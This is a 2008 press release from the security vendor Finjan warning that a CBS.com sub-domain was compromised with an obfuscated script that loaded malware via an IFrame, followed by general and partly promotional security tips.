|  |
Finjan Warns Users Over CBS Portal Being Compromised by Cybercriminals
Finjan, a leader in secure web gateway products, has warned Internet users to be on their guard, following an apparent compromised web page on one of the sub-domains on the CBS.com portal.
"The cybercriminals, who compromised one of the sub-domains under CBS.com, appear to have added a malicious obfuscated script to the infected page. The injected script then dynamically injects an IFrame that pulls malware from a remote server locating in Russia.” said Yuval Ben-Itzhak, Finjan's CTO.
Fortunately for CBS site visitors, Finjan reports actions were already taken to turn that Russian server offline.
Finjan CTO says the company's MCRC - Malicious Code Research Center - has notified CBS of the problem and the team expects the page in question to be taken offline and/or replaced with the original data.
"This saga confirms our many previous warnings that obfuscated code posing a serious threat to Internet users' PCs. Our Threats Reports have continued to identify the increasing use of code obfuscation as a means of bypassing traditional signature-based solutions in order to propagate malware," he said.
"This saga illustrates the popularity of malicious obfuscated code as a weapon of choice by criminal hackers. It also highlights the fact that no Web portal, no matter how high ranking, can be totally secure against a system hack and consequent infection of its visitors. Web users need to exercise caution at all times," he added.
Finjan's security tips and notes to prevent infection:
For businesses:
1. Install a Secure Web Gateway to protect valuable data from being compromised by malware
2. Finjan is offering free Malware Detection Audits to organisations with over 1,000 users
3. Consider the use of a secure platform when accessing Web 2.0 sites
For consumers:
1. Use Finjan's SecureBrowsing browser plug-in to make the right decisions when browsing the Web (see http://securebrowsing.finjan.com )
2. Exercise caution when accessing Web 2.0-enabled sites - e.g. Social Networking portals, wikis and blogs etc.,
3. Do not rely just on signature-based IT security applications
For all users:
1. The preferred way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyse and understand the code embedded within Web content on-the-fly before it reaches the user.
2. Proactive, behaviour-based IT security technology performs in-depth analysis of each and every piece of content, regardless of its original source.
3. This analysis breaks the code into parts, understands the execution path and the functions' call flow.
4. As a result, these solutions can identify code that is about to perform a malicious or suspicious operation, and block it at the perimeter, rather than allowing it to enter the network and relying on desktop security.
5. This type of proactive security is akin to having an `expert system' in a box,' safeguarding users from even the most devious attack techniques, such as those disclosed in this and previous Finjan reports.
For more on the CBS site infection: http://www.finjan.com/MCRCblog.aspx?EntryId=2103 28.11.2008, Finjan
Subscribe to the newsletter | | |
| | | |
